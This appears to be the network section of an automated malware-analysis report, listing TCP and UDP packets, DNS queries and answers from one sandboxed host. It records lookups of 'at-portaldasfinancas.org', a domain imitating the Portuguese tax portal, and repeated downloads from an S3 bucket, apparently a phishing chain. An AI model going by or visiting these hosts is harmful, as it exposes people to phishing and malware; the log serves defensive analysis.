May 22, 2025 14:02:42.443866014 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.443934917 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.444979906 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.444999933 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.445205927 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.445946932 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.446160078 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.472302914 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.652932882 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.653145075 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.658094883 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.658186913 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.658231974 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.658310890 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.658413887 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.658998966 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.660213947 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.660954952 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.661037922 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.661238909 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.662143946 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.662220001 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.662327051 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.663122892 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.663305998 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.664072990 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.664239883 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.665344954 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.861649990 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.861793041 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.865891933 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.866063118 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.866143942 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.868426085 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.868549109 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.871064901 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.871154070 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.871237993 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.872104883 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.872174025 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.872323036 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.873054981 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.873225927 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.874701977 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.874773026 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.874901056 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.875828028 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.875891924 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.876012087 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.876929998 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.876991987 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.877110004 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.877778053 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.877926111 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.879465103 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.879540920 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.879647017 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.879688025 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.880718946 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.880817890 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:42.880922079 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.880968094 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.903790951 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:42.952209949 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.071645021 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.071774006 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.074841022 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.074987888 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.079112053 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.079294920 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.080715895 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.080804110 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.080883980 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.080928087 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.081588030 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.081690073 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.083403111 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.083496094 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.083578110 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.084652901 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.084781885 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.085371017 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.085478067 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.294667006 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.294744968 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.294836998 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.294926882 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.296015978 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.296089888 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.296226025 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.297303915 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.297374010 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.297472954 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.297523975 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.298311949 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.298484087 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.300163031 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.300232887 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.300350904 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.301327944 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.301395893 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.301569939 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.302495003 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.302556038 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.302654982 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.303669930 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.303741932 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.303833008 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.303880930 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.305500031 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.305573940 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.305701971 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.306695938 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.306760073 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.306880951 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.307867050 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.307935953 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.308057070 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.309056997 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.309119940 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.309288025 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.310827017 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.310898066 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.311069012 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.311997890 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.312067032 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.312182903 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.313180923 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.313244104 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.313342094 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.314315081 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.314379930 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.314481020 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.316059113 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.316144943 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.316251040 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.317297935 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.317356110 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.317455053 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.317507982 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.318052053 CEST	443	49709	16.12.65.210	192.168.2.6
May 22, 2025 14:02:43.318172932 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.800900936 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:43.825373888 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:02:45.731517076 CEST	80	49708	18.218.213.93	192.168.2.6
May 22, 2025 14:02:45.731828928 CEST	49708	80	192.168.2.6	18.218.213.93
May 22, 2025 14:02:46.379009008 CEST	49708	80	192.168.2.6	18.218.213.93
May 22, 2025 14:02:46.379484892 CEST	49709	443	192.168.2.6	16.12.65.210
May 22, 2025 14:03:06.526684999 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:06.526746988 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:06.526880026 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:06.527352095 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:06.527363062 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.043097019 CEST	49692	443	192.168.2.6	74.125.137.147
May 22, 2025 14:03:07.043138981 CEST	443	49692	74.125.137.147	192.168.2.6
May 22, 2025 14:03:07.134135962 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.134216070 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.136032104 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.136056900 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.136666059 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.149328947 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.149682045 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.150485992 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.150681019 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.150710106 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.192266941 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.200440884 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.350121975 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.401048899 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.546386003 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.546425104 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.546467066 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.546492100 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.546506882 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.546531916 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.546547890 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.546694040 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.546701908 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.546722889 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.546787024 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.546849012 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.546879053 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.546928883 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.546958923 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.547022104 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.550744057 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.550818920 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.570436001 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:07.571032047 CEST	443	49710	20.109.210.53	192.168.2.6
May 22, 2025 14:03:07.571095943 CEST	49710	443	192.168.2.6	20.109.210.53
May 22, 2025 14:03:09.324868917 CEST	49697	443	192.168.2.6	195.54.163.111
May 22, 2025 14:03:09.324918032 CEST	443	49697	195.54.163.111	192.168.2.6
May 22, 2025 14:03:13.715195894 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:03:13.715220928 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:03:22.578058004 CEST	49692	443	192.168.2.6	74.125.137.147
May 22, 2025 14:03:22.578766108 CEST	443	49692	74.125.137.147	192.168.2.6
May 22, 2025 14:03:22.578874111 CEST	49692	443	192.168.2.6	74.125.137.147
May 22, 2025 14:03:24.577353954 CEST	49697	443	192.168.2.6	195.54.163.111
May 22, 2025 14:03:24.578002930 CEST	443	49697	195.54.163.111	192.168.2.6
May 22, 2025 14:03:24.578125954 CEST	49697	443	192.168.2.6	195.54.163.111
May 22, 2025 14:03:31.137466908 CEST	49706	80	192.168.2.6	74.125.137.94
May 22, 2025 14:03:31.313865900 CEST	80	49706	74.125.137.94	192.168.2.6
May 22, 2025 14:03:31.314084053 CEST	49706	80	192.168.2.6	74.125.137.94
May 22, 2025 14:03:58.730537891 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:03:58.730561018 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:04:21.576569080 CEST	49714	443	192.168.2.6	74.125.137.147
May 22, 2025 14:04:21.576630116 CEST	443	49714	74.125.137.147	192.168.2.6
May 22, 2025 14:04:21.576700926 CEST	49714	443	192.168.2.6	74.125.137.147
May 22, 2025 14:04:21.577120066 CEST	49714	443	192.168.2.6	74.125.137.147
May 22, 2025 14:04:21.577132940 CEST	443	49714	74.125.137.147	192.168.2.6
May 22, 2025 14:04:21.943275928 CEST	443	49714	74.125.137.147	192.168.2.6
May 22, 2025 14:04:21.956715107 CEST	49714	443	192.168.2.6	74.125.137.147
May 22, 2025 14:04:21.956738949 CEST	443	49714	74.125.137.147	192.168.2.6
May 22, 2025 14:04:21.957535028 CEST	443	49714	74.125.137.147	192.168.2.6
May 22, 2025 14:04:22.012921095 CEST	49714	443	192.168.2.6	74.125.137.147
May 22, 2025 14:04:43.735399008 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:04:43.735423088 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:05:06.966159105 CEST	49714	443	192.168.2.6	74.125.137.147
May 22, 2025 14:05:06.966195107 CEST	443	49714	74.125.137.147	192.168.2.6
May 22, 2025 14:05:22.584482908 CEST	49714	443	192.168.2.6	74.125.137.147
May 22, 2025 14:05:22.585066080 CEST	443	49714	74.125.137.147	192.168.2.6
May 22, 2025 14:05:22.585164070 CEST	49714	443	192.168.2.6	74.125.137.147
May 22, 2025 14:05:28.746646881 CEST	49696	443	192.168.2.6	195.54.163.111
May 22, 2025 14:05:28.746671915 CEST	443	49696	195.54.163.111	192.168.2.6
May 22, 2025 14:05:36.036684990 CEST	49679	443	192.168.2.6	20.191.45.158

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2025 14:02:17.245918989 CEST	53	55694	1.1.1.1	192.168.2.6
May 22, 2025 14:02:17.290326118 CEST	53	50172	1.1.1.1	192.168.2.6
May 22, 2025 14:02:18.127268076 CEST	53	60644	1.1.1.1	192.168.2.6
May 22, 2025 14:02:18.386194944 CEST	53	51818	1.1.1.1	192.168.2.6
May 22, 2025 14:02:21.450978041 CEST	51572	53	192.168.2.6	1.1.1.1
May 22, 2025 14:02:21.451208115 CEST	52266	53	192.168.2.6	1.1.1.1
May 22, 2025 14:02:21.606735945 CEST	53	51572	1.1.1.1	192.168.2.6
May 22, 2025 14:02:21.613290071 CEST	53	52266	1.1.1.1	192.168.2.6
May 22, 2025 14:02:23.119529009 CEST	50517	53	192.168.2.6	1.1.1.1
May 22, 2025 14:02:23.119700909 CEST	54543	53	192.168.2.6	1.1.1.1
May 22, 2025 14:02:23.579329967 CEST	53	50517	1.1.1.1	192.168.2.6
May 22, 2025 14:02:23.619816065 CEST	53	54543	1.1.1.1	192.168.2.6
May 22, 2025 14:02:27.876627922 CEST	53	64815	1.1.1.1	192.168.2.6
May 22, 2025 14:02:27.921863079 CEST	53	63160	1.1.1.1	192.168.2.6
May 22, 2025 14:02:35.341711998 CEST	53	52127	1.1.1.1	192.168.2.6
May 22, 2025 14:02:40.728878021 CEST	64152	53	192.168.2.6	1.1.1.1
May 22, 2025 14:02:40.909593105 CEST	53	64152	1.1.1.1	192.168.2.6
May 22, 2025 14:02:54.115111113 CEST	53	53838	1.1.1.1	192.168.2.6
May 22, 2025 14:03:09.013187885 CEST	53538	53	192.168.2.6	1.1.1.1
May 22, 2025 14:03:09.194735050 CEST	53	53538	1.1.1.1	192.168.2.6
May 22, 2025 14:03:16.842735052 CEST	53	59197	1.1.1.1	192.168.2.6
May 22, 2025 14:03:17.094852924 CEST	53	53796	1.1.1.1	192.168.2.6
May 22, 2025 14:03:19.253276110 CEST	138	138	192.168.2.6	192.168.2.255
May 22, 2025 14:03:29.731987000 CEST	50087	53	192.168.2.6	1.1.1.1
May 22, 2025 14:03:29.941977024 CEST	53	50087	1.1.1.1	192.168.2.6
May 22, 2025 14:03:47.275968075 CEST	53	58353	1.1.1.1	192.168.2.6
May 22, 2025 14:04:02.170409918 CEST	53947	53	192.168.2.6	1.1.1.1
May 22, 2025 14:04:02.381982088 CEST	53	53947	1.1.1.1	192.168.2.6
May 22, 2025 14:04:34.210273027 CEST	53	64283	1.1.1.1	192.168.2.6
May 22, 2025 14:04:49.123074055 CEST	55713	53	192.168.2.6	1.1.1.1
May 22, 2025 14:04:49.290400028 CEST	53	55713	1.1.1.1	192.168.2.6
May 22, 2025 14:05:11.689142942 CEST	56283	53	192.168.2.6	1.1.1.1
May 22, 2025 14:05:11.894457102 CEST	53	56283	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 22, 2025 14:02:21.450978041 CEST	192.168.2.6	1.1.1.1	0x4042	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:21.451208115 CEST	192.168.2.6	1.1.1.1	0xbc09	Standard query (0)	www.google.com	65	IN (0x0001)	false
May 22, 2025 14:02:23.119529009 CEST	192.168.2.6	1.1.1.1	0x3c3b	Standard query (0)	at-portaldasfinancas.org	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:23.119700909 CEST	192.168.2.6	1.1.1.1	0x52a6	Standard query (0)	at-portaldasfinancas.org	65	IN (0x0001)	false
May 22, 2025 14:02:40.728878021 CEST	192.168.2.6	1.1.1.1	0x19f2	Standard query (0)	ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:09.013187885 CEST	192.168.2.6	1.1.1.1	0x7b36	Standard query (0)	ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:29.731987000 CEST	192.168.2.6	1.1.1.1	0x8211	Standard query (0)	ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:02.170409918 CEST	192.168.2.6	1.1.1.1	0x4ff9	Standard query (0)	ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:49.123074055 CEST	192.168.2.6	1.1.1.1	0xee03	Standard query (0)	ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	A (IP address)	IN (0x0001)	false
May 22, 2025 14:05:11.689142942 CEST	192.168.2.6	1.1.1.1	0x44d3	Standard query (0)	ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 22, 2025 14:02:21.606735945 CEST	1.1.1.1	192.168.2.6	0x4042	No error (0)	www.google.com		74.125.137.147	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:21.606735945 CEST	1.1.1.1	192.168.2.6	0x4042	No error (0)	www.google.com		74.125.137.106	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:21.606735945 CEST	1.1.1.1	192.168.2.6	0x4042	No error (0)	www.google.com		74.125.137.105	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:21.606735945 CEST	1.1.1.1	192.168.2.6	0x4042	No error (0)	www.google.com		74.125.137.104	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:21.606735945 CEST	1.1.1.1	192.168.2.6	0x4042	No error (0)	www.google.com		74.125.137.99	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:21.606735945 CEST	1.1.1.1	192.168.2.6	0x4042	No error (0)	www.google.com		74.125.137.103	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:21.613290071 CEST	1.1.1.1	192.168.2.6	0xbc09	No error (0)	www.google.com			65	IN (0x0001)	false
May 22, 2025 14:02:23.579329967 CEST	1.1.1.1	192.168.2.6	0x3c3b	No error (0)	at-portaldasfinancas.org		195.54.163.111	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:40.909593105 CEST	1.1.1.1	192.168.2.6	0x19f2	No error (0)	ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	s3-r-w.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
May 22, 2025 14:02:40.909593105 CEST	1.1.1.1	192.168.2.6	0x19f2	No error (0)	s3-r-w.us-east-2.amazonaws.com		16.12.65.210	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:40.909593105 CEST	1.1.1.1	192.168.2.6	0x19f2	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.129.138	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:40.909593105 CEST	1.1.1.1	192.168.2.6	0x19f2	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.128.47	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:40.909593105 CEST	1.1.1.1	192.168.2.6	0x19f2	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.131.174	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:40.909593105 CEST	1.1.1.1	192.168.2.6	0x19f2	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.128.9	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:40.909593105 CEST	1.1.1.1	192.168.2.6	0x19f2	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.93.250	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:40.909593105 CEST	1.1.1.1	192.168.2.6	0x19f2	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.128.192	A (IP address)	IN (0x0001)	false
May 22, 2025 14:02:40.909593105 CEST	1.1.1.1	192.168.2.6	0x19f2	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.232.226	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:09.194735050 CEST	1.1.1.1	192.168.2.6	0x7b36	No error (0)	ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	s3-r-w.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
May 22, 2025 14:03:09.194735050 CEST	1.1.1.1	192.168.2.6	0x7b36	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.133.160	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:09.194735050 CEST	1.1.1.1	192.168.2.6	0x7b36	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.130.161	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:09.194735050 CEST	1.1.1.1	192.168.2.6	0x7b36	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.133.103	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:09.194735050 CEST	1.1.1.1	192.168.2.6	0x7b36	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.129.143	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:09.194735050 CEST	1.1.1.1	192.168.2.6	0x7b36	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.133.110	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:09.194735050 CEST	1.1.1.1	192.168.2.6	0x7b36	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.130.189	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:09.194735050 CEST	1.1.1.1	192.168.2.6	0x7b36	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.111.162	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:09.194735050 CEST	1.1.1.1	192.168.2.6	0x7b36	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.141.2	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:29.941977024 CEST	1.1.1.1	192.168.2.6	0x8211	No error (0)	ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	s3-r-w.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
May 22, 2025 14:03:29.941977024 CEST	1.1.1.1	192.168.2.6	0x8211	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.131.55	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:29.941977024 CEST	1.1.1.1	192.168.2.6	0x8211	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.130.185	A (IP address)	IN (0x0001)	false
